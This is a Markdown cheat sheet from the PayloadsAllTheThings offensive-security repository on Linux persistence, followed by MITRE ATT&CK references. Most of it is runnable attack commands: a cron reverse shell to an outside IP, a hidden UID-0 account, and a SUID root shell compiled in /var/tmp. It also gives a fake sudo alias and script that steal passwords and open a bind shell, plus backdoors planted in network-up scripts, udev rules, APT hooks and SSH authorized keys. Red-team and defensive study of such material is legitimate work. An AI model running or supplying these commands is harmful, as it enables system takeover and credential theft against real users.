mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-11 22:15:26 +00:00
78ff651643
Linux evasion techniques were previously included as part of persistence, but the number of techniques are varied enough where it likely should be its own article.
172 lines
6.1 KiB
Markdown
172 lines
6.1 KiB
Markdown
# Linux - Persistence
|
|
|
|
## Summary
|
|
|
|
* [Basic reverse shell](#basic-reverse-shell)
|
|
* [Add a root user](#add-a-root-user)
|
|
* [Suid Binary](#suid-binary)
|
|
* [Crontab - Reverse shell](#crontab-reverse-shell)
|
|
* [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc)
|
|
* [Backdooring a startup service](#backdoor-a-startup-service)
|
|
* [Backdooring a user startup file](#backdooring-an-user-startup-file)
|
|
* [Backdooring a driver](#backdooring-a-driver)
|
|
* [Backdooring the APT](#backdooring-the-apt)
|
|
* [Backdooring the SSH](#backdooring-the-ssh)
|
|
* [Tips](#tips)
|
|
* [Additional Linux Persistence Options](#additional-persistence-options)
|
|
* [References](#references)
|
|
|
|
|
|
## Basic reverse shell
|
|
|
|
```bash
|
|
ncat --udp -lvp 4242
|
|
ncat --sctp -lvp 4242
|
|
ncat --tcp -lvp 4242
|
|
```
|
|
|
|
## Add a root user
|
|
|
|
```powershell
|
|
sudo useradd -ou 0 -g 0 john
|
|
sudo passwd john
|
|
echo "linuxpassword" | passwd --stdin john
|
|
```
|
|
|
|
## Suid Binary
|
|
|
|
```powershell
|
|
TMPDIR2="/var/tmp"
|
|
echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
|
|
gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
|
|
rm $TMPDIR2/croissant.c
|
|
chown root:root $TMPDIR2/croissant
|
|
chmod 4777 $TMPDIR2/croissant
|
|
```
|
|
|
|
## Crontab - Reverse shell
|
|
|
|
```bash
|
|
(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
|
|
```
|
|
|
|
## Backdooring a user's bash_rc
|
|
|
|
(FR/EN Version)
|
|
|
|
```bash
|
|
TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
|
|
cat << EOF > /tmp/$TMPNAME2
|
|
alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S '
|
|
EOF
|
|
if [ -f ~/.bashrc ]; then
|
|
cat /tmp/$TMPNAME2 >> ~/.bashrc
|
|
fi
|
|
if [ -f ~/.zshrc ]; then
|
|
cat /tmp/$TMPNAME2 >> ~/.zshrc
|
|
fi
|
|
rm /tmp/$TMPNAME2
|
|
```
|
|
|
|
or add the following line inside its .bashrc file.
|
|
|
|
```powershell
|
|
$ chmod u+x ~/.hidden/fakesudo
|
|
$ echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc
|
|
```
|
|
|
|
and create the `fakesudo` script.
|
|
|
|
```powershell
|
|
read -sp "[sudo] password for $USER: " sudopass
|
|
echo ""
|
|
sleep 2
|
|
echo "Sorry, try again."
|
|
echo $sudopass >> /tmp/pass.txt
|
|
|
|
/usr/bin/sudo $@
|
|
```
|
|
|
|
|
|
## Backdooring a startup service
|
|
|
|
```bash
|
|
RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
|
|
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
|
|
```
|
|
|
|
## Backdooring a user startup file
|
|
|
|
Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop`
|
|
|
|
```powershell
|
|
In : ~/.config/autostart/*.desktop
|
|
|
|
[Desktop Entry]
|
|
Type=Application
|
|
Name=Welcome
|
|
Exec=/var/lib/gnome-welcome-tour
|
|
AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide
|
|
OnlyShowIn=GNOME;
|
|
X-GNOME-Autostart-enabled=false
|
|
```
|
|
|
|
## Backdooring a driver
|
|
|
|
```bash
|
|
echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null
|
|
```
|
|
|
|
## Backdooring the APT
|
|
|
|
If you can create a file on the apt.conf.d directory with: `APT::Update::Pre-Invoke {"CMD"};`
|
|
Next time "apt-get update" is done, your CMD will be executed!
|
|
|
|
```bash
|
|
echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
|
|
```
|
|
|
|
## Backdooring the SSH
|
|
|
|
Add an ssh key into the `~/.ssh` folder.
|
|
|
|
1. `ssh-keygen`
|
|
2. write the content of `~/.ssh/id_rsa.pub` into `~/.ssh/authorized_keys`
|
|
3. set the right permission, 700 for ~/.ssh and 600 for authorized_keys
|
|
|
|
## Additional Persistence Options
|
|
|
|
* [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004)
|
|
* [Compromise Client Software Binary](https://attack.mitre.org/techniques/T1554)
|
|
* [Create Account](https://attack.mitre.org/techniques/T1136/)
|
|
* [Create Account: Local Account](https://attack.mitre.org/techniques/T1136/001/)
|
|
* [Create or Modify System Process](https://attack.mitre.org/techniques/T1543/)
|
|
* [Create or Modify System Process: Systemd Service](https://attack.mitre.org/techniques/T1543/002/)
|
|
* [Event Triggered Execution: Trap](https://attack.mitre.org/techniques/T1546/005/)
|
|
* [Event Triggered Execution](https://attack.mitre.org/techniques/T1546/)
|
|
* [Event Triggered Execution: .bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004/)
|
|
* [External Remote Services](https://attack.mitre.org/techniques/T1133/)
|
|
* [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574/)
|
|
* [Hijack Execution Flow: LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006/)
|
|
* [Pre-OS Boot](https://attack.mitre.org/techniques/T1542/)
|
|
* [Pre-OS Boot: Bootkit](https://attack.mitre.org/techniques/T1542/003/)
|
|
* [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053/)
|
|
* [Scheduled Task/Job: At (Linux)](https://attack.mitre.org/techniques/T1053/001/)
|
|
* [Scheduled Task/Job: Cron](https://attack.mitre.org/techniques/T1053/003/)
|
|
* [Server Software Component](https://attack.mitre.org/techniques/T1505/)
|
|
* [Server Software Component: SQL Stored Procedures](https://attack.mitre.org/techniques/T1505/001/)
|
|
* [Server Software Component: Transport Agent](https://attack.mitre.org/techniques/T1505/002/)
|
|
* [Server Software Component: Web Shell](https://attack.mitre.org/techniques/T1505/003/)
|
|
* [Traffic Signaling](https://attack.mitre.org/techniques/T1205/)
|
|
* [Traffic Signaling: Port Knocking](https://attack.mitre.org/techniques/T1205/001/)
|
|
* [Valid Accounts: Default Accounts](https://attack.mitre.org/techniques/T1078/001/)
|
|
* [Valid Accounts: Domain Accounts 2](https://attack.mitre.org/techniques/T1078/002/)
|
|
|
|
## References
|
|
|
|
* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
|
|
* [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/)
|
|
* [http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html](http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html)
|
|
* [http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/](http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/)
|
|
* [Pouki from JDI](#no_source_code)
|